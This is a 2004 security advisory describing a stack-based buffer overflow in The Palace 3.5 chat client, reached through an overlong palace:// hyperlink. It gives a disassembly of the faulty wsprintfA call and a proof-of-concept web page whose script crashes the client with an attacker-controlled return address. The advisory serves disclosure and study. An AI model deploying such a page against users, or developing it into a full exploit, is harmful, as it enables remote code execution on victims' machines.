The Palace 3.x (Client) Stack Overflow Vulnerability

####################################################

Credit:
Author     : Peter Winter-Smith

Software:
Packages   : The Palace 3.5 (Client)
Version    : 3.5 and below
Vendor     : 'Copyright © 1996-2000 Communities.com'
Vendor Url : http://www.thepalace.com/

Vulnerability:
Bug Type   : Stack-based Buffer Overflow
Severity   : Highly Critical
              + Remote Code Execution

1. Description of Software

"The Palace is the FREE graphical chat. Create and wear your own picture
(avatar). Build your very own chat server."
- Vendors Website


2. Bug Information

(a). Stack-based Buffer Overflow

When using the Palace chat software, it is immediately obvious that the
most common and efficient method of allowing users to join a specific chat
server is to construct a special hyperlink which will automatically load
the application and cause it to connect to the specified location.

These hyperlinks are constructed as follows:


  palace://some.machine:9998/


The port may be omitted from the url if the server is running on the
default port 9998/tcp.

There exists a stack-based buffer overflow condition which can be caused
to take effect when a user of the Palace chat software visits a link
similar to the following:


  palace://('a'x118)('BBBB')('XXXX')


In the above url, a saved base pointer is overwritten with 42424242h, and
a saved return address is overwritten with 58585858h


    (i). Part of the Vulnerable Code

>From a quick look at the Palace chat application, it is evident that the
overflow is the result of a dangerous call to 'wsprintfA'.

The saved return address which is overwritten is placed on the stack by an
instruction found at 004081D7:


004081D7  |. E8 1DA4FFFF    CALL Palace32.004025F9
004081DC  |. 59             POP ECX

...

004025F9   $ E9 9CC00000    JMP Palace32.0040E69A


Within the procedure beginning at 0040E69A, at offset 0040E745 the address
of wsprintfA is loaded into the esi register. At 0040E78A a buffer of 84h
(132 bytes) is designated to hold the formatted output from calling
wsprintfA (the actual formatting string being used is
"Connecting to %s:%d"). Then, at 0040E792 the fatal call is made!


0040E745  |. 8B35 ACC04900  MOV ESI,DWORD PTR DS:[<&USER32.wsprintfA>]

...

0040E78A  |. 8D85 7CFFFFFF  LEA EAX,DWORD PTR SS:[EBP-84]
0040E790  |. 53             PUSH EBX
0040E791  |. 50             PUSH EAX
0040E792  |. FFD6           CALL ESI


If an overly long server address was specified in the url (as the '%s'
formatting argument), the 132 byte buffer is overflowed and the saved
return address from 004081D7 is completely overwritten!

When the function returns, at line 0040E7FA, code execution resumes from
an arbitrary address which an attacker can supply!


0040E7F7  |> 5F             POP EDI
0040E7F8  |. 5E             POP ESI
0040E7F9  |. C9             LEAVE
0040E7FA  \. C3             RETN



3. Proof of Concept Code

The nature of this flaw allows exploitation to take place from simply
viewing a specially crafted web-page! Below is such a page that will cause
an access violation when attempting to execute code located at 58585858h!
Since I am getting a little bored of actually writing exploit code, the
exploitation of this flaw is left as an exercise to the reader!


------------------------------[badpage.html]------------------------------
<html><body><script>
window.open("palace://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaBBBBXXXX
")</script></body></html>
--------------------------------------------------------------------------


Please remove any line-breaks which occur during the re-formatting of the
overly long server address string by my email client otherwise the crash
will probably not go as planned!


4. Patches - Workarounds

None as of 07/02/2004.


5. Credits

    The discovery, analysis and exploitation of this flaw is a result of
research carried out by Peter Winter-Smith. I would ask that you do not
regard any of the analysis to be 'set in stone', and that if investigating
this flaw you back trace the steps detailed earlier for yourself.

Greets and thanks to:
    David and Mark Litchfield, JJ Gray (Nexus), Todd and all the
packetstorm crew, Luigi Auriemma, Bahaa Naamneh, sean(gilbert(perlboy)),
pv8man, nick k., Joel J. and Martine.


6. Extras!

  (a). Quick Question

I have a quick question for all those who actually read my advisories:
Does the analysis of the vulnerable code within the applications that I
find bugs in help anyone at all? I would be interested to know if you
consider these a worthwhile addition, or a waste of space! Email me:
peter4020@hotmail.com and let me know what you think :-)


  (b). Fun Challenge

If you need something to do during your coffee breaks, try and crack this
extremely simple yet interesting encryption routine which I have designed!
It's very basic, and does not require any advanced mathematical knowledge
to crack. A couple of encrypted strings are below:

  'wdle lo emyduksaec eoah vt mrec eo  enadrlaey'

  'b! mhtnrfglaindinptrwni eterc y'too   luokiahtse!'

Hints:
- Remove the single quotes before starting!
- Spacing is important!
- 'able was i ere i saw elba' is exactly the same decrypted as it is
   encrypted!


o This document should be mirrored at:
                  http://www.elitehaven.net/thepalace.txt

_________________________________________________________________
Sign-up for a FREE BT Broadband connection today! 
http://www.msn.co.uk/specials/btbroadband